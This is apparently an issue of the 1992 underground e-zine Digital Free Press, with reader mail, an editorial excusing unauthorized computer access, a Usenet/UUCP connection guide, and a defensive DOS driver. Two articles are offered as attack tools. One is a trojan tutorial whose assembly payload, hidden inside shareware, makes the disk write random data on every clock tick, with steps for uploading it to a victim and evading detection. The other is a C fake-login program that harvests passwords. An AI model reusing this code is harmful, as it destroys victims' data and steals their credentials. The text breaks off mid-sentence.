######### ############ ######### ########### ############ ########### #### #### #### #### #### #### #### #### #### #### #### #### ######## ########### #### #### ######## ######### #### #### #### #### #### #### #### #### ########### #### #### ######### #### #### DIGITAL FREE PRESS ------------------------------------------------------------------------------- Volume 1.0 Issue 2.0 ------------------------------------------------------------------------------- * A Publication of The Underground Computing Foundation (UCF) * * Send Submissions to: hackers%underg@uunet.uu.net * * Editor: Max Cray (max%underg@uunet.uu.net) * * BBS: The Underground (401) 847-2603 (v.32) * ------------------------------------------------------------------------------ Statement of Purpose and Disclaimer The Digital Free Press is an uncensored forum to document current activities in and of the world of modern technology. It is published under the premise that it is better to know, rather than not know, so no attempt is made to hide any information no matter how dangerous it may be. Information is a double edged sword. It is neither good nor bad, and can be used for either good or bad. Warning: Some information in this document could be used for illegal activities. Use at your own risk. Articles are the opinion of the authors listed, and not of the editor (unless of course the editor wrote it). ------------------------------------------------------------------------------ In this Issue: 1. Mail to Max 2. Editorial: Old 'Hackers' vs. New 'Hackers' - Max Cray 3. A Tour of The Underground Computing Foundation BBS - Max Cray 4. Protection of DOS Devices - GodNet Raider 5. Overwriting Trojan - The BBC 6. Breaches of Security - The Joker 7. Getting on Usenet - Max Cray 8. The BBC's Crash House (Fun with ANSI.SYS) - The BBC ------------------------------------------------------------------------------ Mail to Max: ------------------------------------------------------------------------------ Date: Tue, 31 Dec 91 23:49:32 -0500 From: X-Mailer: Mail User's Shell (7.2.2 4/12/91) To: underg!ccn Subject: digital free press While investigating a problem with the mail and uucp queues on my system I discovered a message from you entitled "DIGITAL FREE PRESS Volume 1 Issue 1". The majority of this message gave details for activities that I consider to be either illegal or primarily malicious in nature. As such, I refuse to have my computer system be involved in any way in the distribution of this material. I realize that some people, perhaps including yourself, might construe this action as restricting the freedom of the press but rest assured that this is not the case. I am in no way usurping your rights to say anything that you want to say, I am only refusing to help pay for it. I will phone your system one last time to deliver this letter and then I will sever the uucp link. If you wish to discuss this matter with me you may call me either at work during the day or at home in the evening. If I do not hear from you within two weeks I will return the unused portion of your $50. -- %% Can I be excused, my brain is full. ** -- [Editor's note: Lesson here is be sure you know your upstream sysadmin's policy on distribution of controversial material. I was able to get the uucp connection back, but only after agreeing not to distribute DFP anymore through his site.] ---------------------------------------------------------------------------- Date: Thu, 2 Jan 92 20:39:09 CST From: To: max@underg Subject: Re: DIGITAL FREE PRESS Volume 1 Issue 1 Newsgroups: alt.hackers Organization: :noitazinagrO You obviously have no idea about what alt.hackers is about, to refresh your memory, enclosed is a copy of an article you should have read earlier, but knowing your type, probably didn't. please note that it EXPLICITLY states that this is not a forum for elitoid DOS pirate dumbshit WEENIES who like to call themselves "hackers". go back to WWIVnet or Celeritynet or whatever pirate-net it is that people like you use nowadays, asshole. [alt.hackers FAQ deleted] P.S. Please do not post this type of material here again. -- -- [Editor's note: How can this person hope to influence people by being so confrontational? In fact the response I got from the first issue of DFP was about 90% positive, and there were many requests to be put on the mailing list. Thanks for your support, and please keep the mail coming!] ------------------------------------------------------------------------------ ------------------ | Article 2 of 8 | EDITORIAL ------------------ Real Hackers? There is a lot of talk these days about how the word 'hacker' has been redefined by the press. The theory is that the old hackers, as portrayed in Steven Levy's excellent book _Hackers: Heroes of the Computer Revolution_, were good and pure and this breed of hacker dramatized in the press is some new evil non-hacker terrorist. This is nonsense. According to the book, the hacker ethic(paraphrased) is as follows: 1. Access to computers should be unlimited and total. 2. All information should be free. 3. Mistrust Authority - Promote Decentralization. 4. Hackers should be judged by their hacking. 5. You can create art and beauty on a computer. 6. Computers can change your life for the better. In pursuit of the hacker ethic these heroes performed various acts that would not be looked upon favorably in today's anti-hacker society: Used Equipment Without Authorization (Page 20) ---------------------------------------------- " So, without any authorization whatsoever, that is what Peter Sampson set out to do, along with a few friends of his from an MIT organization with a special interest in model railroading. It was a casual, unthinking step into a science-fiction future, but that was typical of the way that an odd subculture was pulling itself up by its bootstraps and growing to underground prominence-to become a culture that would be the impolite, unsanctioned soul of computerdom. It was among the first computer hacker escapades of the Tech Model Railroad Club, or TMRC." Phone Phreaked (Page 92) ------------------------ "He had programed some appropriate tones to come out of the speaker and into the open receiver of the campus phone that sat in the Kluge room. These tones made the phone system come to attention, so to speak, and dance." Modified Equipment Without Authorization (Page 96) -------------------------------------------------- " Nelson thought that adding an 'add to memory' instruction would improve the machine. It would take _months_, perhaps, to go through channels to do it, and if he did it himself he would learn something about the way the world worked. So one night Stewart Nelson spontaneously convened the Midnight Computer Wiring Society." Circumvented Password Systems (Page 417) ---------------------------------------- "Stallman broke the computer's encryption code and was able to get to the protected file which held people's passwords. He started sending people messages which would appear on screen when they logged onto the system: 'I see you chose the password [such and such]. I suggest that you switch to the password "carriage return." It's much easier to type, and also it stands up to the principle that there should be no passwords.' 'Eventually I got to the point where a fifth of all the users on the machine had the Empty String password.' RMS later boasted. Then the computer science laboratory installed a more sophisticated password system on its other computer. This one was not so easy for Stallman to crack. But Stallman was able to study the encryption program, and as he later said, 'I discovered changing one word in that program would cause it to print out your password on the system console as part of the message that you were logging in.' Since the 'system console' was visible to anyone walking by, and its messages could easily be accessed by any terminal, or even printed out in hard copy, Stallman's change allowed any password to be routinely disseminated by anyone who cared to know it. He thought the result 'amusing.' Certainly these hackers were not anarchists who wanted only to destroy. They had a personal code of ethics, the hacker ethic to base their behavior on. In fact the modern hacker has his/her ethics intact. Compare the above hacker ethic with the hacker ethic found in _Out of the Inner Circle_ by Bill 'The Cracker' Landreth, a teenager arrested by the FBI (Page 18,60): 1. Never delete any information you can not easily restore. 2. Never leave any names on a computer. 3. Always try to obtain your own information. The common denominator to these ethics systems are the respect for technology, and the personal growth through free access and freedom of information. Certainly the attitude towards private property is the same. Accessing and using equipment that you do not own is okay as long as you do not prevent those who own it from using it, or damage anything. With respect to the hacker ethic the hackers mentioned in _Cyberpunk: Outlaws and Hackers on the Computer Frontier_ by Katie Hafner and John Markoff were in fact good hackers. If free access, and free information were the law of the land would Kevin Mitnick have gone to jail? I do not think so. Sure he got the source code for VMS, but is there any evidence that he used this information for personal gain, or did he simply use the information to improve his understanding of the VMS operating system? Robert T. Morris's worm program was a clever hack. Of course he 'gronked' it by programming the replication rate much too fast, but still there is no evidence that he had any intention of doing harm to the system. It was simply a computer experiment. Who owns the Internet? Is it some mysterious 'them' or is it our net? If it is out net, then we should be able to try some stuff on it, and to heck with 'them' if they can't take a joke. Of course the German hackers are a different story. What they got in trouble for was espionage, and not hacking, which is a breach of faith, and is hacking for personal gain. However selling Minix to the KGB almost makes it forgivable... It is my contention that hackers did not change. Society changed, and it changed for the worse. The environment the early hackers were working in correctly viewed these activities as the desire to utilize technology in a personal way. By definition hackers believe in the free access to computers and to the freedom of information. If you do not believe in these principles you are not a hacker, no matter how technologically capable you are. You are probable just a tool for the greed society. Current bad mouthing of hackers is simply snobbery. Rather than cracking down on the modern hacker, we should reinforce the hacker ethic, a code of conduct not based upon greed and lust for the almighty dollar, but instead for personal growth through the free access of computers and information, and a respect for technology. It is the humane thing to do. ------------------------------------------------------------------------------ ------------------ | Article 3 of 8 | ------------------ A Tour of the Underground Computing Foundation BBS by Max Cray I have noticed a lot of people call The UCF BBS and are unable to find the good stuff, so let me take the opportunity to point out a few of the high spots. First of all it is connected to the Usenet. Your international e-mail address would be %underg@uunet.uu.net. With this address you can subscribe to all the good stuff like Phrack and NIA. There is also a mailing list: hackers%underg@uunet.uu.net. E-mail me if you want to be included on the list. You can participate in the Usenet newsgroups, of which alt-cud-digest is a must. alt.dcom.telecom is an outstanding resource for those interested in the telephone network. There is vast amounts of very technical information that passes through on a daily basis. Far too much to read it all. Type USENET at the prompt to see all the newsgroups. Type in the name of the group you want, and then type the READ command. Type the number of the first message you want to read. If you call often you will want to configure your NEW message scan using the JOIN command. Type ? at the prompt to get help. There is a more local network set up, which has a newsgroup called ri.cug. This is the Rhode Island Computer Underground, and it contains info on the local scene around here. If you are interested in journals type INFO. I try to keep the latest issues of NIA, PHRACK, CUD, EFFector, and other journals here. If you are interested in back issues go into the files section and LOG into the directory /public/text. You can view or download text philes here. There is also some stuff of interest in the /public/hacks directory. The /public/comm directory contains subdirectories for the WAFFLE philes, and UUPC philes that you may need to connect to the UUCP network. Sorry there are no codez as it is an information board and not a pirate board. ------------------------------------------------------------------------------ ------------------ | Article 4 of 8 | ------------------ -=[ Protection of DOS devices ]=- -or- /*******************************************/ /* Unarc, Unzip, Lha extract, and be merry */ /* for tomorrow we may lock. */ /*******************************************/ - written by - GodNet Raider - of - The CyberUnderground -=[ "Information is the greatest weapon of power to the modern wizard." ]=- ]----------------------------------------------------------------------------[ Introduction: ------------- This phile is written in response to the practice of misusing using MS-DOS devices (ie.. to make archive bombs). The following will explain the problem and some of the possible solutions. Also included is an ASM source that will remap the 'CLOCK$' device to a 'NUL' (basic bit bucket) type device. The problem: ------------ In a never ending attempt of OS designers to mask the inner workings of system hardware, the idea of device drivers comes into play. A device driver is basically an attempt to standardize I/O with the systems' hardware. Thus allowing access to every thing from keyboards to CD ROMS without an in depth knowledge of the physical hardware involved. This ideal is valid and of great help in program development, yet when the drivers are not well defined there is the tendency for them to cause more harm then good. A case in point is the 'CLOCK$' device in MS-DOS. 'CLOCK$' is a driver designed to allow updating of the CMOS clock. It passes data direct to the CMOS clock with out buffering or any attempt at error checking. Thereby passing valid data as well as invalid. An with no internal mechanism to detect an overflow condition/not sending EOF after a read will tend to hang systems/knock out the date and time stored in the CMOS clock. This problem has come of use to the hacker community. Several methods of the assault have been: 1) Uploading 'CLOCK$.*' files to remote systems. 2) Using BBS archiveing utilities to create 'CLOCK$.*' files for download. 3) Low level disk editing of archive files to rename files in it to 'CLOCK$.*' Some possible solutions: ------------------------ Of the solutions available none are complete. There are benefits and disadvantages to each. Nor is the following a complete list, it is only an attempt to discus some of the common ones. Abstinence: Not excepting/expanding archive files on ones system. This is the most undesirable but most effective and is only listed 'for abstinence makes the heart grow fonder'. Scanning archives: Most archive programs come with a utility to view the files stored in a given archive (lha v foobar.lzh). The only real drawback is having to take the time to scan archives. This does not protect from BBS's that create real time archives, extract to check for virus batches (with out looking thought the archive first), uploads of 'CLOCK$.*' files, and programs that create and write to a 'CLOCK$.*' file. Updating programs: Getting new versions of programs that watch for 'CLOCK$.*' and avoid creating/writing to said file is a problem in that you must wait for the author to come up with the fix and have to pay for the update. Another reason for software makers to release code with their programs. TSR protection programs: Other than yet another drain on precious RAM and clock time. Can only protect from programs that create files though interrupts. Pipes and redirects may slip though the cracks. LOW LEVEL disk editing of io.sys files: Renaming the 'CLOCK$' device is a method that will protect on all levels but may cause some programs to hang that use it. Also to replace it is not easy for you must reedit the file (without moving it). It should also be noted that the new name MUST be the same size as the original (6 letters). Creation of a new 'CLOCK$' device: This offers the protection of the above method with out the need of changing OS binary files and to allow/disallow the ORIGINAL 'CLOCK$' device by editing the config.sys file instead. One disadvantage is that update of the CMOS clock though 'CLOCK$' is stoped. Yet the BIOS clock is still accessible and the CMOS clock can be updated though the BIOS setup routine or programs that write direct to CMOS. Source for a simple null mask clock device driver is provided below and can be use as a template to create your own 'CLOCK$' replacement. There are other solutions to this problem not listed here. Clock$ null device Source Code: ------------------------------- The following ASM code is for a DOS device driver that will replace the existing 'CLOCK$' device when added to the config.sys file (device=outclock.sys). The key points of the device are: 1) The line - DW 8080h. This tells the device loader that outclock wishes to replace the present clock device with it's self. This will trap all internal calls and to redirect any calls to the new driver. 2) The line - DB 'CLOCK$ '. This will setup the device to trap external access though pipes, indirects, file I/O, and IOCTL's. 3) The device strategy is to simply ignore all incoming commands to the device (standard practice for the 'NUL' device). This driver does not prevent access to the CMOS clock except though the CLOCK$ device. So it will not effect the running of programs EXCEPT those that try to update the CMOS clock though the this device. +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+ CSEG segment public 'CODE' org 0 assume CS:CSEG, DS:CSEG, ES:CSEG DEVICE proc far DD 0ffffffffh ;------------------------------; DW 8080h ; The following 5 definitions ; DW DEV_STRATEGY ; 18 (bytes) MUST be at offset ; DW DEV_INTERRUPT ; 0 in the binary file. ; DB 'CLOCK$ ' ;------------------------------; KEEP_ES DW ? KEEP_BX DW ? FUNCTIONS label word DW INIT DW CHK_MEDIA DW MAKE_BPB DW IOCTL_IN DW INPUT_DATA DW NONDSTRCT_IN DW INPUT_STATUS DW CLEAR_INPUT DW OUTPUT_DATA DW OUTPUT_VERIFY DW OUTPUT_STATUS DW CLEAR_OUTPUT DW IOCTL_OUT DEV_STRATEGY: mov CS:KEEP_ES, ES mov CS:KEEP_BX, BX ret DEV_INTERRUPT: push ES push DS push AX push BX push CX push DX push SI push DI push BP mov AX, CS:KEEP_ES mov ES, AX mov BX, CS:KEEP_BX mov ES:word ptr [BX] + 3, 0000h mov AL, ES:[BX] + 2 shl AL, 1 xor AH, AH lea DI, FUNCTIONS add DI, AX jmp word ptr [DI] INIT: lea AX, E_O_P mov ES:word ptr [BX] + 14, AX mov ES:word ptr [BX] + 16, CS jmp short QUIT INPUT_STATUS: KEY_READY: NONDSTRCT_IN: INPUT_DATA: OUTPUT_DATA: OUTPUT_VERIFY: CHK_MEDIA: MAKE_BPB: IOCTL_IN: IOCTL_OUT: OUTPUT_STATUS: CLEAR_OUTPUT: CLEAR_INPUT: QUIT: or ES:word ptr [BX] + 3, 0100h pop BP pop DI pop SI pop DX pop CX pop BX pop AX pop DS pop ES ret E_O_P: DEVICE endp CSEG ends end DEVICE +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+ ]============================================================================[ underg!tsf!gnr@uunet.uu.net (GodNet Raider) -=[ "You gotta learn to listen, before you learn to play." ]=- ------------------------------------------------------------------------------ ------------------ | Article 5 of 8 | ------------------ To: hackers@underg.UUCP Subject: Text phile 2 From: bbc@tsf.UUCP (The BBC) Organization: The CyberUnderground Welcome class... An now... for another lesson in the misuse of computers... So you thought that INJECT.BAT was fun... But you did not like the idea of making the injection give the fun away by causing the host program to crash after the trojan ran... Well then lets get a little more sophisticated then... Now rather than overwriting the existing host code lets just... Oooooh... Say... Add a new function to an existing program... Now what to add... Something destructive???? Why not... Ok How about a bit o' code that just moves the absolute disk write interrupt to the clock interrupt... Then each time the clock ticks (about 18 times a second) the computer attempts a disk write with random data... Good way to test THOSE ol' ALT-CTRL-DEL reflexes... Oooooh... What fun, it is to crash, in a one drive nonbacked-up system... Well now for the fun part... Step 1: Make a batch file called "ADDON.BAT" an in it place the following commands - ============================================================= echo off cls rename %2 ~~temp2.~tp > nul copy %1+~~temp2.~tp %2 /b > nul erase ~~temp2.~tp > nul ============================================================= Step 2: Make a ASM file called "TROJAN.ASM" an in it place the following - ============================================================= PROGSEG segment para public 'CODE' assume CS:PROGSEG DOIT proc wSaveDS dw 9090h ; Store old DS register here... mov AX, DS mov CS:wSaveDS, AX ; Save DS address for hosts' ; use... ;-------------- v Place Trojan Here v -------------; mov AX, 3526h ; Get DOS absolute write interrupt... int 21h mov DX, BX ; Set clock interrupt to returned ; value... mov AX, ES mov DS, AX mov AX, 2508h int 21h xor BX, BX ; Rezap used registers [other than ; AX/DS/ES]... xor CX, CX xor DX, DX ;--------------- ^ Place Trojan Here ^ ------------; mov AX, CS:wSaveDS ; Restore DS, ES registers for ; host... mov DS, AX mov ES, AX xor AX, AX DOIT endp ; Host will start after this ; point... PROGSEG ends end ============================================================= Step 3: Then assemble and link the trojan file. Use exe2bin [or whatever utility you have to convert .EXEs to .COM format] to make a .COM file out of TROJAN.EXE..... Step 4: Then copy a *.COM file into the same directory. Should be part of some shareware thing that the target sysop would like. With docs an all... would not want them to get suspicious, now would we............. Step 5: Run the following command from the dos prompt... ADDON Step 6: Upload the mess to the unsuspecting sysop and watch the fun! See and you thought hacking was hard...... Of course if they get smug and start searching for the added code.... We'll just have to add extra code (nops' ect) and/or switching some of the code around in the ASM file... 'Another fine mess' from... The BBC --------------------------------------------------------------------- ...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC) -=[ "Anarchy is never HAVING to say you're sorry." ]=- ------------------------------------------------------------------------------ ------------------ | Article 6 of 8 | ------------------ Breaches of Security by The Joker ---------------------- Hello loves, Here we are with yet another page from the _Tomb of Ultimate Evil_ (THOSE of good aliment must make a saving throw against neophytedom). Todays chat is on the subject of collecting passwords, not that anyone here would have nothing but nobel reasons to do such a thing. An in this wonderfully wacky world of networks, UNIX, and VMS it's just the in t'ing to do. So now boys and girls, hacks and hacketts, Rocky and bullwinkel let us begin. Ah, what a tangled web we weave when first we practice to deceive... Yet how easy it makes it to get what we want. An deception is the key here. For thanks to the simple format of most logins (name, password... rank, serial number, underwear condition...). The simplicity of the answer makes it a wonderful little exercise in shell programming. What is needed is a simple program that pretends it's a login shell and is set like a little program beartrap. Sitting quietly, waiting for that most elusive of pray... The north american password! (An them's good eating too). So as we send our assistant into the system to wrestle and subdue the foul beasty, let us listen to a message from the good folks at Mutual of Omaha... Ooop sorry, instead let us look at a model of a simple password capture shell. What? You want the insurance commercial instead... Well, tough cookies. |------------------------------[ Cut Line ]----------------------------------| /* LogTrap.c (c) 1992 by Joculator inc., no rights reserved (or respected). Rubber cell #182 Arkham Asylum Gotham City Captures first login attempt by a user, to file (*szKeepFile), then give phony error (*szPhonyError) and call real login shell (*aszRealShell []). For the express purpose of promoting glorious world chaos. */ #include #include #include #define TRUE 1 #define MAX_BUFFER 256 #define ECHO 0 #define NOECHO 1 #define NEWLINE "\n" #define ANSI_CLS "\x1b[2J" #define ANSI_NOECHO "\x1b[8m \x1b[40D" #define ANSI_ECHO "\x1b[0m" struct { char *szPrompt, fNoEcho; } *ptPrompts, Prompts [] = /* Prompts patterned after real login shell. */ { /* [Prompt string], [ECHO | NOECHO] */ "Login: " , ECHO, "Password: " , NOECHO, NULL }; char *szPhonyError = "Invalid login.\n", /* Error patterned after LOGIN. */ *aszRealShell [] = /* Command to call real LOGIN. */ { "LOGIN", /* list parameters (if any) here */ NULL }, *szKeepFile = "~tmp0167.tmp", /* Save booty in... */ szWorkBuffer [MAX_BUFFER]; void main (void); void main (void) { FILE *OutStream; /* Cover our tracks. */ printf (ANSI_CLS); /* Prompt for and save user information. */ for (ptPrompts = Prompts; ptPrompts->szPrompt; ptPrompts++) { printf (ptPrompts->szPrompt); if (ptPrompts->fNoEcho) printf (ANSI_NOECHO); fgets (szWorkBuffer, MAX_BUFFER, stdin); if (ptPrompts->fNoEcho) printf (ANSI_ECHO); /* If file error, ignore it but, don't try to write to file. */ if (OutStream = fopen (szKeepFile, "a")) { fputs (ptPrompts->szPrompt, OutStream); fputs (szWorkBuffer, OutStream); } fclose (OutStream); } /* Stick tongue out, Naaaa... */ printf (szPhonyError); /* Commit process suicide by running LOGIN shell on top of our process. */ /* It should not return (unlike a bad check). */ execvp (aszRealShell [0], &aszRealShell [1]); /* if execvp () (it got to this point?), lock system. */ while (TRUE); } |------------------------------[ Cut Line ]----------------------------------| So there you have it. Now all that is left to do is: 1: Set Prompts [], *szPhonyError, and *aszRealShell [] to match the LOGIN of the target system. 2: Set *szKeepFile to where you want your ill gotten booty to go. 3: Compile the whole mess. 4: LOGIN to the target system and run the program. For more fun place copies on more than one terminal, if possible, on the same system. 5: Run to your duck blind and wait for a user to spring your lil' trap. That's it, have fun, And remember... If someone offers you drugs, just say... Yo! ---------------------------------------------------------------------- ...uunet!rayssd!galaxia!underg!tsf!joker (The Joker) -=[ "All it takes is one bad day, then maddness has its way." ]=- ------------------------------------------------------------------------------ ------------------ | Article 7 of 8 | ------------------ Getting on Usenet by Max Cray Much of the information from this phile comes from the excellent text phile INTRO.DOC that comes with the Waffle BBS package. Other information was gained from various books, and postings on the net itself, especially the FAQs (Frequently Asked Questions) postings in news.answers, and also my personal experience. Before you actually connect your machine to Usenet, it may be easier for you to learn about Usenet, and what it can do for you, by calling a BBS that is connected to Usenet. Good choices would be my own Underground, or any of the systems listed in the *nixpub. This is a document regularly posted to the Usenet listing all known unix bbs systems. You can get a copy of this from my bbs or from the following sources: o anonymous uucp from jabber. +1 215 348 9727 [Telebit access] LOGIN: nuucp NO PWD [no rmail permitted] this list: /usr/spool/uucppublic/nixpub.short long list: /usr/spool/uucppublic/nixpub o "*NIX Depot" BBS on jabber. o USENET, regular posts to: comp.misc alt.bbs o the nixpub electronic mailing list. to be included or deleted from this distribution, send mail to nixpub-list-request@ls.com. o anonymous ftp from GVL.Unisys.COM [128.126.220.102] under ~/pub/nixpub/{long,short} o archive server from cs.widener.edu. mail to archive-server@cs.widener.edu Subject: or body of send nixpub long or send nixpub short or send nixpub long short or even index nixpub I will talk more about anonymous uucp, mailing lists, and archive servers in a minute. UUCP SOFTWARE The first thing you need to connect your machine to the Usenet is software, and the first choice would be a version of the unix operating system itself. In fact to get a copy of the real thing is not that expensive anymore. As of this writing Consensys Corporation (1301 Pat Booker Rd., Universal City, TX, 78148, 1-800-387-8951) has UNIX System V Release 4 (the latest) including C development, Networking, and X Windows, for 386+ systems for $495. Certainly a big chunk of change, but a great deal for what you get. If cost is important you might try Coherent by Mark Williams Company (60 Revere Dr., Northbrook, IL. 60062, 1-800-627-5967). This is a less robust unix clone os that should run on any pc compatible computer. The price is right at $100. If you just want uucp connectivity, but you don't want to switch to a real operating system, then you might want to check out the Waffle BBS package. It can be found at SIMTEL, UUNET, or also can be gotten from the source: darkside.com BBS at 1-408-245-SPAM (e-mail: dell@vox.darkside.com), or from The Underground BBS. The package does not need to be run as a bbs, but can also be run as a personal system, and it is shareware. If you want freeware, then you might be interested in UUPC which can also be gotten from SIMTEL, UUNET, or from my bbs. Source code is available. Once you have software, read and re-read the docs. Get a friend to connect with you and learn how to use your software before you bother a sysadmin with connecting to Usenet proper. CONNECTING TO USENET And now the hard part: you need to find someone to feed you. Mail feeds are usually not too difficult, but newsfeeds are harder to come by as they take more resources from the host machine than mail feeds due to the much larger volume of information. Possible sources of feeds include: - Systems on the previously mentioned *nixpub listing. - Local colleges or universities. - Systems found scanning the uucp maps. These can be gotten using anonymous uucp from UUNET, or also from the mail server at MIT. You can request an index of the maps by sending email to 'mail-server@pit-manager.mit.edu' with this message: path send usenet/comp.mail.maps/index quit You can get help for this mail server by replacing the 'send' line with just 'help'. You can see how being on the net already helps you to get your machine on the net. The uucp maps are also an excellent hackers tool as they list the sites in your area, points of contact, and how they connect up to each other (at least for uucp connections). I believe older copies of the uucp maps can be found in the TELECOM or UNIX forums on Compuserve. - Pay services. Here are some of the providers: o Anterior Technology P.O. Box 1206 Menlo Park, CA 94026-1206 Voice: (415) 328-5615 info@fernwood.mpk.ca.us (UUCP, connectivity, name service, MX forwarding, news feeds) o CERFnet P.O. Box 85608 San Diego, CA 92186-9784 Voice: (800) 876-CERF help@cerf.net (connectivity, name service, MX forwarding, news feeds) o Colorado SuperNet, Inc. Attn: David C. Menges Colorado School of Mines 1500 Illinois Golden, CO 80401 Voice: 303-273-3471 dcm@csn.org (UUCP, news feeds) o MSEN, Inc. 628 Brooks Street Ann Arbor, MI 48103 Voice: (313) 741-1120 info@msen.com (UUCP, connectivity, name service, MX forwarding, news feeds) o MV Communications, Inc. P.O. Box 4963 Manchester, NH 03108-4963 Voice: (603) 429-2223 Data: (603) 429-1735 (log in as "info" or "rates") info@mv.mv.com (UUCP, name service, MX forwarding, news feeds) o NEARnet Attn: John Curran BBN Systems and Technologies MS 6/3B 10 Moulton Street Cambridge, MA 02138 Voice: (617) 873-8730 jcurran@nic.near.net (connectivity, name service, MX forwarding, news feeds (for NEARnet sites)) o Netcom - Online Communication Services P.O. Box 20774 San Jose, CA 95160 Voice: (408) 554-8649 bobr@netcom.com (UUCP, connectivity, name service, MX forwarding, news feeds) o SURAnet 8400 Baltimore Blvd. College Park, MD 20742 Voice: (301) 982-3214 news-admin@sura.net (connectivity, name service (for SURAnet sites), news feeds (for SURAnet sites)) o UUNET Canada, Inc. 1 Yonge St., Suite 1801 Toronto, Ontario Canada M5E 1W7 Voice: (416) 368-6621 info@uunet.ca or uunet-ca@uunet.uu.net (UUCP, connectivity, name service, MX forwarding, news feeds) o UUNET Technologies Inc. 3110 Fairview Park Drive, Suite 570 Falls Church, VA 22042 Voice: (703) 876-5050 info@uunet.uu.net AlterNet (network connectivity) info: alternet-info@uunet.uu.net (UUCP, connectivity, name service, MX forwarding, news feeds) o UUNORTH, Inc. Box 445, Station E Toronto, Ontario Canada M6H 4E3 Voice: (416) 537-4930 or (416) 225-UNIX o Performance Systems International, Inc. 11800 Sunrise Valley Drive, Suite 1100 Reston, VA 22091 Voice: (703) 620-6651 or (800) 827-7482 Computerized info: all-info@psi.com Human-based info: info@psi.com (UUCP, connectivity, name service, MX forwarding, news feeds) SUBMIT A UUCP MAP ENTRY All machines connecting to the UUCP network should submit a UUCP map to the map coordinator, . The purpose of these maps is to facilitate finding the fastest path between any two systems, and also to prevent duplicate names that would cause mail to be lost. Maps are posted to comp.mail.maps newsgroup on a fairly regular basis. In addition to the maps, there is a README file that documents these details in much more detail -- the information here is not enough to construct a full map entry. You should obtain this README file from one of your neighbors; it is also available on the waffle BBS system +1 408 245 SPAM (as the file /public/waffle/uucp-map.txt), or it can be found in the /public/text/misc directory on The Underground BBS. The basic format of the maps consists of a number of lines with a # and a letter, followed by a tab and then information corresponding to that letter: #N UUCP name of site #S manufacturer machine model; operating system & version #O organization name #C contact person's name #E contact person's electronic mail address #T contact person's telephone number #P organization's address #L latitude / longitude #R remarks #U netnews neighbors #W who last edited the entry ; date edited # sitename .domain sitename remote1(FREQUENCY), remote2(FREQUENCY), remote3(FREQUENCY) ARCHIVE SERVERS There are many archive servers. These systems provide files via e-mail. For example the pit-manager mail server at MIT mentioned above is one. You can get back issues of the Computer Underground Digest from the University of Chicago archive server. To use the U. of Chicago email server, send mail with the subject "help" (without the quotes) to: archive-server@chsun1.spc.uchicago.edu. There are many more archive servers. You can also get binaries using a pair of utilities called uuencode, and uudecode. These utilities convert binary code to ascii text code suitable for transmission via e-mail (or to be posted on when of the many .binaries newsgroups on Usenet. MAILING LISTS Once you have an e-mail account you can join mailing lists. These can be the electronic equivalent of the newsletters, or they can echo mail to multiple destinations. For example you mail a certain mail list, and copies will be echoed to all who are on the list. For example you can sign up for the Phrack electronic P/H newsletter by: 1. Send a piece of electronic mail to "LISTSERV@STORMKING.COM". The mail must be sent from the account where you wish Phrack to be delivered. 2. Leave the "Subject:" field of that letter empty. 3. The first line of your mail message should read: SUBSCRIBE PHRACK 4. DO NOT leave your address in the name field! (This field is for PHRACK STAFF use only, so please use a full name) Sign up for the NIA newsletter by sending mail to: nia@nuchat.sccsi.com. Incidentally, you do not have to be part of the Usenet, ot the Internet (the TCP/IP network), to participate. See the excellent article in NIA73 about e-mail gateways between networks "Internet to Anywhere" by Industrial Phreak. I should also mention that with a mail account, you can still post to a Usenet newsgroup. Send mail to @ucbvax.berkeley.edu. For newsgroup you want to change any periods to dashes. For example, alt-bbs@ucbvax.berkley.edu to post to the alt.bbs newsgroup. If you desire a response to your posting be sure to put in a line like: Please e-mail all replies. USING UUCP TO TRANSFER FILES The uucp program allows files to be transmitted to and from any neighboring system, via the command line. To "push" a file from the local machine to the remote machine: uucp filename.here unix!~/filename.there To "pull" a file into a machine off the remote machine: uucp unix!~/filename.there filename.here unix is used here as the name of the remote machine. For example you can connect to the uunet machine directly via a 1-900 number, and get access to a wealth of source code and information about the network. Call 1-900-468-7727 and use the login "uucp" with no password. Callers are charged 50 cents per minute. The charges appear on your phone bill. The file uunet!~/help contains instructions. The file uunet!~/ls-lR.Z contains a complete list of the files available and is updated daily. Files ending in Z need to be uncompressed before being used. The file uunet!~/compress.tar is a tar archive containing the C sources for the uncompress program. 1. How to reach UUNET's 900 number via uucp Here are some sample a L.sys or Systems file lines suitable for UUNET's 900 number: # Simple line. uunet Any ACU 19200 1-900-468-7727 in:--in:--in: uucp # # Set up for a Telebit. uunet Any cua0 19200 cua0 "" ATX0S50=255S111=30DT19004687727\r CONNECT "" login: uucp Modify as appropriate for your site, of course, to deal with your local telephone system and uucp version. All modems on the 900 lines are Telebit T2500s. Note that these modems first answer with V.32, then at 2400, 1200, and last with PEP tones. This "900" number charges $.50US per minute to the caller. 2. Where the files are This file of instructions exists as the file uunet!~/info/archive-help uunet!~/ls-lR.Z contains a list of all files available. This is the compressed output of an `ls -lR' command. This file is updated each night. (Note this file is currently about 520 Kbytes *compressed*). Information on other indexes can be found in uunet!~/index/README. The file uunet!~/info/layout details the basic organization of the archive. 3. File formats Files with .Z endings are compressed. The uncompress program is available in uunet!~/compress.tar if you don't have it. Some very large files have been split into several files for you. This are usually evidenced by sequenced endings after a .Z ending. eg: emacs/18.57.Z.01 .. emacs/18.57.Z.39 After you obtain all of the parts you need only concatenate them in the proper order. eg: cat 18.57.Z.* > emacs-18.57.Z UUCP File Transfer Tips You must write files you transfer to a directory which the user "uucp" has write access. That user, not you, will actually do the transfer. /usr/spool/uucppublic is the common place used. You may see different pathnames for files in an archive which equate to the same thing. For example an archive that is /usr/spool/ftp (aka ~ftp), might also accessible as /usr/spool/uucppublic (aka ~uucp, or just ~ for UUCP). Be sure you use absolute pathnames when specifying remote filename. If you don't, your working directory will be prepended to the pathname in the command. uunet!file and uunet!~/file are different. uunet!~/ is the best reference to the base of the archive via uucp. Permission denied messages normally indicate a file name or file access problem. Be sure to have the latest copy of the file list. Beware when using shell meta-characters in transfers. You need to escape them in most circumstances (eg: the ! in csh). Also note that there are a number of UUCP implementations which do not handle multi-file transfers correctly. If you pass a * to the remote system you may get 'access denied' messages. These indicate a UUCP problem, not a file problem. OTHER RESOURCES In addition to the resources already mentioned, there are several books which discuss USENET and/or UUCP maintenance. They include: Using UUCP and Usenet; Grace Todino; ISBN 0-937175-10-2 Date: 1990. Pages: 210. Cost: $24.95 Managing UUCP and Usenet; Tim O'Reilly and Grace 